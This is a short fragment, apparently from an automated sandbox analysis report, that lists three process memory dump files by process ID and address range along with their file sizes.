                                                                                                                                          • memory/4588-584-0x000000001CD40000-0x000000001CD4E000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            56KB

                                                                                                                                          • memory/4588-580-0x000000001C7F0000-0x000000001CB40000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            3.3MB

                                                                                                                                          • memory/5160-586-0x000002D546870000-0x000002D546878000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            32KB